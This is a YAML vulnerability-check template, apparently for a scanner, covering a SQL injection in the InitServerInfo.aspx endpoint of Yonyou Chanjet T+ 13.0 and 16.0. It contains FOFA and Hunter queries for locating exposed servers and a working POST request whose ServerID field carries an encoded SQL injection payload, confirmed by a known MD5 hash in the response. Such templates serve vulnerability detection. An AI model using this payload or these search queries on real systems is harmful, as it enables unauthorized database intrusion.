product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus InitServerInfo.aspx SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友畅捷通-TPlus 专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该系统在InitServerInfo.aspx接口处未对用户的输入进行过滤和校验存在SQL注入漏洞。
version: 畅捷通T+ 13.0、畅捷通T+ 16.0
note: ''
search:
  FOFA: app="畅捷通-TPlus" && product="畅捷通-TPlus"
  Hunter: app.name="畅捷通 T+"
protocol: http
link: https://blog.csdn.net/qq_40550150/article/details/137014001
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /tplus/UFAQD/InitServerInfo.aspx?preload=1
      cookie: HOST=null; ASP.NET_SessionId=3ysypgqljcjlb3jh0e4pktq3; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1710379542; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1710379542
      data: operbtn=create&ServerID=%27%2b(select%0d%0a1%0d%0awhere%0d%0a1%0d%0ain%0d%0a(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))))%2b%27
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and